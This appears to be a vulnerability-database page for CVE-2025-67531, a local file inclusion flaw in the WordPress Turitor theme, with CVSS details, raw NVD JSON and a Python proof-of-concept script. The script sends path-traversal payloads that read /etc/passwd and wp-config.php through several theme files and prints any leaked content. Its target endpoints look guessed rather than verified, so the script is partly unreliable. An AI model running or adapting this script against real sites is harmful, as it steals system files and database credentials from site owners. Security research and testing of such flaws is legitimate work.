Security Vulnerability Report
中文
CVE-2025-67531 CVSS 7.5 HIGH

CVE-2025-67531

Published: 2025-12-09 16:18:28
Last Modified: 2026-04-27 18:16:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Turitor turitor allows PHP Local File Inclusion.This issue affects Turitor: from n/a through < 1.5.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Turitor Theme < 1.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67531 PoC - WordPress Turitor LFI Vulnerability # Affected: Turitor Theme < 1.5.3 import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Common Turitor vulnerable endpoints vulnerable_paths = [ '/wp-content/themes/turitor/functions.php', '/wp-content/themes/turitor/inc/template-tags.php', '/wp-content/themes/turitor/inc/excerpts.php' ] # LFI payloads for testing payloads = [ '../../../../etc/passwd', '../../../../wp-config.php', '../../../../../../etc/passwd', '../../../../../wp-config.php' ] print(f'[*] Testing CVE-2025-67531 on {target}') print('[*] Target: WordPress Turitor Theme < 1.5.3') print('[*] Vulnerability: Local File Inclusion') for path in vulnerable_paths: url = target + path for payload in payloads: params = {'file': payload} try: r = requests.get(url, params=params, timeout=10) if 'root:' in r.text or 'DB_NAME' in r.text: print(f'[+] VULNERABLE! Found config at {url}?file={payload}') print(f'[+] Response snippet: {r.text[:500]}') except Exception as e: print(f'[-] Error testing {url}: {e}') print('[*] PoC testing complete')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67531", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:27.830", "lastModified": "2026-04-27T18:16:41.947", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Turitor turitor allows PHP Local File Inclusion.This issue affects Turitor: from n/a through < 1.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/turitor/vulnerability/wordpress-turitor-theme-1-5-3-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}